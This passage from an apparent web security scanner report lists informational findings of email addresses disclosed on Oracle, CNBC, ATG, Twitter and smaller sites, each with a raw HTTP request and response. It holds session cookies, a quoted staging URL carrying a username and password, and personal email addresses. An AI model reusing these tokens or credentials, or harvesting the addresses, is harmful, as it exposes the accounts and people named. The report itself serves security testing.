
       finalSubmit();
   }
   else{
       return true;
   }
   return false;
}

var ckngLogin;
function checkLogin(myForm){
ckngLogin = true;
//https://stage.register.cnbc.com/cas/validateuser?username=guptaashishkumar@gmail.com&password=password
new Ajax.Request("/cas/validateuser", {
method: 'post',
parameters : Form.serialize(myForm),
onSuccess : function(transport){
ckngLogin = false;
var r
...[SNIP]...

22.21. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:35 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.22. https://oracleus.wingateweb.com/portal/newreg.ww

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oracleus.wingateweb.com
Path:   /portal/newreg.ww

Issue detail

The following email address was disclosed in the response:

Request

GET /portal/newreg.ww?brand=jone&eve=ow&wt=ow HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:14 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Connection: Keep-Alive
Content-Length: 11209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="expir
...[SNIP]...
<a href="mailto:openworldreg@gpj.com">
...[SNIP]...

22.23. https://register.cnbc.com/forgotPassword1.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotPassword1.do

Issue detail

The following email address was disclosed in the response:

Request

POST /forgotPassword1.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
Content-Length: 45
Cache-Control: max-age=0
Origin: https://register.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE

step=step1&emailAddress=xss%40xss.cx&x=21&y=7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/
Content-Length: 85679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...
<input type="text" name="emailAddress" value="xss@xss.cx" onblur="this.className='doneWith';" onfocus="this.className='current';" class="notVisited">
...[SNIP]...

22.24. http://search.oracle.com/search/searchui/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /search/searchui/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /search/searchui/s_code.js HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=94577a1c1e6c366bc46e69bb4867b280b00dd079463a; ses.qapp.sg_tab_name=Oracle+OpenWorld; s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D; BIGipServerses_ext_prod_pool=477779860.30494.0000

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 12 Mar 2011 07:00:10 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (H;max-age=150+0;age=140;ecid=115635838160,0)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 29511
Date: Tue, 06 Sep 2011 15:54:25 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.25. https://shop.oracle.com/pls/ostore/f

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /pls/ostore/f

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/ostore/f?p=700:2:3925708704474272::NO:RP,2:PROD_HIER_ID:4509881204651805720002&tz=-5:00 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Referer: https://shop.oracle.com/pls/ostore/f?p=700:2:0::NO:RP,2:PROD_HIER_ID:4509881204651805720002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=3925708704474272; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343714603; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Ftechnetwork%2Fcommunity%2Fdeveloper-vm%2Findex.html; s_sq=oracleotnlive%2Coracleglobal%3D%2526pid%253Dotn%25253Aen-us%25253A%25252Fcommunity%25252Fdeveloper-vm%25252F%2526pidt%253D1%2526oid%253Dotn%25253Aen%25253Ahnav%25253Astore%25253Astoredatabase%25253Astoredatabaseseeall%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:15:21 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 57414
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Category - Database</t
...[SNIP]...
<a href="mailto:oraclehelp_ww@oracle.com?subject=Oracle Store Inquiry">
...[SNIP]...

22.26. https://support.bigcommerce.com/javascript/livesearch.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.bigcommerce.com
Path:   /javascript/livesearch.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/livesearch.js HTTP/1.1
Host: support.bigcommerce.com
Connection: keep-alive
Referer: https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=95sh21hkr74gpcp03q1tinf0b1k1muq3; 2__utma=^first.1378413579147:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343379147:41658941.7.10.1315341506; 2__utmc=^first.1378413579147:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.16.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:46 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 02:22:15 GMT
ETag: "1a24-4804f55acc3c0"
Accept-Ranges: bytes
Cache-Control: max-age=432000
Expires: Sun, 11 Sep 2011 15:39:46 GMT
Vary: Accept-Encoding
Content-Length: 6692
Connection: close
Content-Type: application/javascript

/*
// +----------------------------------------------------------------------+
// | Copyright (c) 2004 Bitflux GmbH |
// +--------------------------------------
...[SNIP]...
<devel@bitflux.ch>
...[SNIP]...

22.27. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.innerfade.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /wp-content/themes/vision/library/media/js/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/vision/library/media/js/jquery.innerfade.js?ver=2.9.2 HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:42 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 23 Aug 2010 11:42:00 GMT
ETag: "1a1ce-3da0-48e7c22eeb200"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 15776
Content-Type: application/javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.28. http://twitter.com/favorites/shopify.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /favorites/shopify.json

Issue detail

The following email address was disclosed in the response:

Request

GET /favorites/shopify.json?callback=jsonp1315341241192&_=1315341242270 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; js=1; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr%2BtBqX%2ByaisxCLF6xfO3uKHShNVLj0esMdHqHFECtPbOE1k52hOf7UKzfYel%2B8XI7S4OHB7xajaLQ%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTUy%250ANTA5ZjQ3YzU2NjU3NDczMjkwZTE4ZjM0ODEyNmJj--6efa10660411d898fcdb6e0727f46bb60e898b0d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315323265-77462-12903
X-RateLimit-Limit: 150
ETag: "d85462a61b67e0c3fc4866501999a05e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 06 Sep 2011 15:34:25 GMT
X-RateLimit-Remaining: 79
X-Runtime: 0.08983
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ddde2aba33aaf670ae3703c911641ba819c591a7
X-RateLimit-Reset: 1315326731
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTUy%250ANTA5ZjQ3YzU2NjU3NDczMjkwZTE4ZjM0ODEyNmJj--6efa10660411d898fcdb6e0727f46bb60e898b0d; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 39503
Connection: close

jsonp1315341241192([{"id_str":"109286997138489344","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"E6F6F9","protected":false,"id_str":"62222199","notifications":nu
...[SNIP]...
:true,"utc_offset":-18000,"profile_link_color":"003F7A","description":"A romantic code-monkey who is a Ruby, Rails, and Mac evanglist. I'm a Mormon and created @flickr4tw1tter & RVM::FW. E-mail me at: stevenhaddox@shortmail.com","profile_sidebar_border_color":"337A91","url":"http:\/\/stevenhaddox.com","time_zone":"Indiana (East)","default_profile_image":false,"default_profile":false,"statuses_count":18807,"profile_use_backgr
...[SNIP]...

22.29. http://webzoomers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webzoomers.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: webzoomers.com
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/solutions.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:36:53 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 42574
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:Info@ResourcePoint.net">
...[SNIP]...

22.30. https://www.atg.com/en/password/request/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /en/password/request/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/password/request/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:53:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:54 GMT
Content-Length: 27516
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>Request Passwor
...[SNIP]...
<a href="mailto:support@atg.com">support@atg.com</a>
...[SNIP]...

22.31. https://www.atg.com/javascript/form.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /javascript/form.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/form.js HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/register/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:34:31 GMT
ETag: "60d8f-d77-48bbf4e07efc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3447
Content-Type: application/x-javascript
Cache-Control: proxy-revalidate, max-age=7200
Expires: Tue, 06 Sep 2011 17:53:54 GMT
Date: Tue, 06 Sep 2011 15:53:54 GMT
Connection: keep-alive

<!--//
function displayState(){
if (document.getElementById){
var mcountry = document.getElementById('country');
var mstateLabel = document.getElementById('stateList');
    if (mcountry !
...[SNIP]...
['questionEmailRecipient'].value == "Sales - Commerce Suite/Platform" || frm.elements['questionEmailRecipient'].value == "Sales - Commerce OnDemand"){
frm.elements['campaignEmailTo'].value = "atg-commerce@atg.com";
frm.elements['campaignCode'].value = 'Web_ContactMe';
frm.elements['interactionCode'].value = 'LXPD5A00058K';
} else if (frm.elements['questionEmailRecipient'].value == "Sales - All"){
frm.elements['campaignEmailTo'].value = "atgsales@atg.com";
frm.elements['campaignCode'].value = 'Web_ContactMe';
frm.elements['interactionCode'].value = 'LXPD5A00058K';
} else if (frm.elements['questionEmailRecipient'].value == "Sales - Click to Call or Click to Chat" || frm.elements['questionEmailRecipient'].value == "Sales - Recommendations" ){
frm.elements['campaignEmailTo'].value = "atg-optimization@atg.com";
frm.elements['campaignCode'].value = 'WebES-Contact-Me';
frm.elements['interactionCode'].value = 'WebES-Contact_Me_Requested';
} else if (frm.elements['questionEmailRecipient'].value == "Sales - Call Tracking" ){
frm.elements['campaignEmailTo'].value = "atg-optimization@atg.com";
frm.elements['campaignCode'].value = 'WebES-Contact-Me-Media';
frm.elements['interactionCode'].value = 'WebES-Contact-Me-Media_Requested';
} else if (frm.elements['questionEmailRecipient'].value == "Other" ){
frm.elements['campaignEmailTo'].value = "webmaster@atg.com,abayiate@atg.com,cmanfred@atg.com";
frm.elements['campaignCode'].value = 'Web_ContactMe_Others';
frm.elements['interactionCode'].value = 'Web_ContactMe_Others_Requested';
}else {
frm.elements['campai
...[SNIP]...

22.32. http://www.beautyproductsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:22 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:25 GMT
ETag: "29a4892-2c7c-4dd2622d"
Accept-Ranges: bytes
Content-Length: 11388
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
<a href="mailto:info@beautyproductsdirect.com">info@beautyproductsdirect.com</a>
...[SNIP]...

22.33. http://www.beautyproductsdirect.com/inc/js/jquery.innerfade.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /inc/js/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

Request

GET /inc/js/jquery.innerfade.js HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.beautyproductsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:22 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Fri, 01 Apr 2011 11:34:27 GMT
ETag: "29a4d0f-13be-4d95b843"
Accept-Ranges: bytes
Content-Length: 5054
Content-Type: application/x-javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.34. http://www.beautyproductsdirect.com/lashes.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /lashes.html

Issue detail

The following email address was disclosed in the response:

Request

GET /lashes.html HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.beautyproductsdirect.com/
